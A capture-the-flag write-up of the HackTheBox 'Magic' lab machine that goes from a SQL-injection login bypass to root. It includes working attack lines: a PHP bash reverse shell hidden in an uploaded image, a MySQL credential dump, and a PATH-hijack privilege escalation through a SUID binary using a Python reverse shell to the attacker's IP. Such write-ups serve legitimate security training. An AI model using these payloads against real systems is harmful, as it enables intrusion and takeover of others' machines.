Posts Hackthebox Magic Writeup
Post
Cancel

Hackthebox Magic Writeup

Information:~$

TitleDetails
NameMagic
IP10.10.10.185
DifficultyMedium
Points30
OSLinux

Brief:~$

Magic is Medium rated linux box which allow us to revise our basic concepts like sql injection, file upload vulnerability. After bypassing login and uploading reverse shell by embedding it into an image we get reverse shell from there we get credentials of mysql and on dumping mysql database we get theseus password. From there we get an SUID binary and on exploiting it by setting PATH variable we are able to gain root access.

Reconnaissance:~$

As usual nmap scan

Nmap:~$

1
nmap -sC -sV 10.10.10.185

Nothing Exciting Just 2 Ports

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Nmap 7.80 scan initiated Wed Apr 29 16:12:56 2020 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.185
Nmap scan report for 10.10.10.185
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 29 16:14:10 2020 -- 1 IP address (1 host up) scanned in 74.76 seconds

We get two ports open 22(SSH), 80(HTTP)

Let’s take a look at Port 80

Nothing exciting except a login Page link

Magic

Let’s visit the login page

Magic

Initial Foothold:~$

Login page is vulnerbale to SQL injection we can easily bypass it and how did I know that Whenever you see a login Page try common creds and check for sql injection too

User: admin Password: ' or '1'='1

On Login we get File Upload Functionality

Magic

We can use Image Upload functionality in our advantage to gain shell onto system

echo “& /dev/tcp// 0>&1'\");?>” » Image.jpg

1
2
3
4
~/htb/boxes/Magic/scripts >> echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.153/1234 0>&1'\");?>" >> index.jpeg
 ~/htb/boxes/Magic/scripts >> mv index.jpeg index.php.jpeg
 ~/htb/boxes/Magic/scripts >> ls
index.php.jpeg

Upload the file Before that start a listener on your machine

As soon as you upload the image open the image in another tab

http://10.10.10.185/images/uploads/ImageName

Check back your Listener for any incoming connection

1
2
3
4
5
6
7
 ~/htb/boxes/Magic/scripts >> nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.153] from (UNKNOWN) [10.10.10.185] 55038
www-data@ubuntu:/var/www/Magic/images/uploads$ whoami
whoami
www-data
www-data@ubuntu:/var/www/Magic/images/uploads$ 

Enumeration:~$

On doing some Enumertaion we can find DB Creds in db.php5 file in var/www/Magic

1
2
3
4
5
6
7
8
9
10
11
12
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';
    ......................................
?>
www-data@ubuntu:/var/www/Magic$ 

Hurray We got password for theseus

1
2
3
4
5
6
www-data@ubuntu:/$ su theseus
su theseus
Password: iamkingtheseus

su: Authentication failure
www-data@ubuntu:/$ 

Authentication Failure.

Then this should be the login password of the MySQL database. When I was ready to use the mysql command, I was prompted apt-get install, but the MySQL service was clearly running on the target machine

Let’s see what all mysql services we have

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
www-data@ubuntu:/$ ls -lah /usr/bin | grep mysql
ls -lah /usr/bin | grep mysql
-rwxr-xr-x  1 root root     3.5M Jan 21 06:10 mysql_config_editor
-rwxr-xr-x  1 root root      22M Jan 21 06:10 mysql_embedded
-rwxr-xr-x  1 root root     5.0M Jan 21 06:10 mysql_install_db
-rwxr-xr-x  1 root root     3.5M Jan 21 06:10 mysql_plugin
-rwxr-xr-x  1 root root     3.7M Jan 21 06:10 mysql_secure_installation
-rwxr-xr-x  1 root root     3.5M Jan 21 06:10 mysql_ssl_rsa_setup
-rwxr-xr-x  1 root root     3.5M Jan 21 06:10 mysql_tzinfo_to_sql
-rwxr-xr-x  1 root root     4.3M Jan 21 06:10 mysql_upgrade
-rwxr-xr-x  1 root root     3.7M Jan 21 06:10 mysqladmin
lrwxrwxrwx  1 root root       10 Jan 21 06:10 mysqlanalyze -> mysqlcheck
-rwxr-xr-x  1 root root     3.9M Jan 21 06:10 mysqlbinlog
-rwxr-xr-x  1 root root     3.7M Jan 21 06:10 mysqlcheck
-rwxr-xr-x  1 root root      27K Jan 21 06:10 mysqld_multi
-rwxr-xr-x  1 root root      28K Jan 21 06:10 mysqld_safe
-rwxr-xr-x  1 root root     3.7M Jan 21 06:10 mysqldump
-rwxr-xr-x  1 root root     7.7K Jan 21 06:10 mysqldumpslow
-rwxr-xr-x  1 root root     3.7M Jan 21 06:10 mysqlimport
lrwxrwxrwx  1 root root       10 Jan 21 06:10 mysqloptimize -> mysqlcheck
-rwxr-xr-x  1 root root     4.1M Jan 21 06:10 mysqlpump
lrwxrwxrwx  1 root root       10 Jan 21 06:10 mysqlrepair -> mysqlcheck
-rwxr-xr-x  1 root root      39K Jan 12  2018 mysqlreport
-rwxr-xr-x  1 root root     3.7M Jan 21 06:10 mysqlshow
-rwxr-xr-x  1 root root     3.7M Jan 21 06:10 mysqlslap
www-data@ubuntu:/$ 

What can we do now, Let’s see if there is anyway to create backup

I found this article (https://support.hostway.com/hc/en-us/articles/360000220190-How-to-backup-and-restore-MySQL-databases-on-Linux)

Privilege Escalation:~$

www-data -> theseus:~$

1
2
3
4
5
6
7
8
9
10
11
1. Back up the database using the following command:

mysqldump -u [username] –p[password] [database_name]
The parameters of the said command as follows:

[username] - A valid MySQL username.

[password] - A valid MySQL password for the user.

[database_name] - A valid Database name you want to take backup.

Let’s dump the databse Mango

1
mysqldump --databases Magic -utheseus -piamkingtheseus

we get username and password admin:Th3s3usW4sK1ng

1
2
3
4
5
6
7
8
9
www-data@ubuntu:/$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:/$ whoami && id
whoami && id
theseus
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus@ubuntu:/$ 

We are theseus

For Stable Shell write your ssh public key in /home/theseus/.ssh/authorized_keys

theseus -> root:~$

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 ~/htb/boxes/Magic >> ssh theseus@10.10.10.185
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

29 packages can be updated.
0 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
theseus@ubuntu:~$ id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus@ubuntu:~$ 

We have got a stable shell let’s move forward

Enumerate

Find the SUID files

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
theseus@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
.....................
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping
theseus@ubuntu:~$ 

We can find an Unusal SUID sysinfo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
theseus@ubuntu:~$ /bin/sysinfo
====================Hardware Info====================
H/W path           Device      Class      Description
=====================================================
                               system     VMware Virtual Platform
/0                             bus        440BX Desktop Reference Platform
/0/0                           memory     86KiB BIOS
/0/1                           processor  AMD EPYC 7401P 24-Core Processor
/0/1/0                         memory     16KiB L1 cache
/0/1/1                         memory     16KiB L1 cache
/0/1/2                         memory     512KiB L2 cache
/0/1/3                         memory     512KiB L2 cache
/0/2                           processor  AMD EPYC 7401P 24-Core Processor
/0/28                          memory     System Memory
/0/28/0                        memory     4GiB DIMM DRAM EDO
/0/100                         bridge     440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1                       bridge     440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7                       bridge     82371AB/EB/MB PIIX4 ISA
/0/100/7.1                     storage    82371AB/EB/MB PIIX4 IDE
/0/100/7.3                     bridge     82371AB/EB/MB PIIX4 ACPI
...............................   

====================Disk Info====================
Disk /dev/loop0: 3.7 MiB, 3825664 bytes, 7472 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop1: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
..........................
====================CPU Info====================
processor       : 0
vendor_id       : AuthenticAMD
cpu family      : 23
model           : 1
model name      : AMD EPYC 7401P 24-Core Processor
stepping        : 2
microcode       : 0x8001230
cpu MHz         : 2000.000
cache size      : 512 KB
...............................

====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        624M        1.8G        4.1M        1.4G        3.0G
Swap:          947M          0B        947M
theseus@ubuntu:~$ 

The content displayed by sysinfo is mainly divided into four parts

  • Hardware Info
  • Disk Info
  • CPU Info
  • Mem Usage

After checking the tips given by Forum’s predecessors, I found that sysinfo is a combination of four Linux commands:

  • Hardware Info = lshw -short
  • Disk Info = fdisk -l
  • CPU Info = cat /proc/cpuinfo
  • Mem Usage = free -h

Since sysinfo the native Linux command is called, we can change the PATH variable to create a content that is determined by ourselves, and the file name is any one of the above four binary files, specifically:

/tmp/magic Create a fdisk file in the directory , and then write a reverse shell to it:

1
2
3
4
5
6
theseus@ubuntu:/tmp/magic$ cat fdisk 
python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.153",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
theseus@ubuntu:/tmp/magic$ chmod 755 fdisk 
theseus@ubuntu:/tmp/magic$ ls -lah | grep fdisk 
-rwxr-xr-x  1 theseus theseus  228 May  7 23:38 fdisk
theseus@ubuntu:/tmp/magic$ 

Then write the /tmp/magic directory to the PATH environment variable:

1
theseus@ubuntu:/tmp/magic$ export PATH=/tmp/magic:$PATH 

You can find more details HERE

In this way, the goal is achieved, which sysinfo is to execute /tmp/magic the fdisk

The machine monitors port 9001, and the target machine runs sysinfo commands:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 ~/htb/boxes/Magic >> rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.153] from (UNKNOWN) [10.10.10.185] 52746
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:~# id && whoami
id && whoami
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root
root@ubuntu:~# cd /root/
cd /root/
root@ubuntu:/root# ls
ls
info.c  root.txt
root@ubuntu:/root# 

Resources:~$

TopicLink
MySql BackupHere
Privilege Escation using Path varibaleHere

With this, we come to the end of the story of how I owned Magic 😃

Thank you for reading !!!

I would love to hear about any suggestions or queries.

This post is licensed under CC BY 4.0 by the author.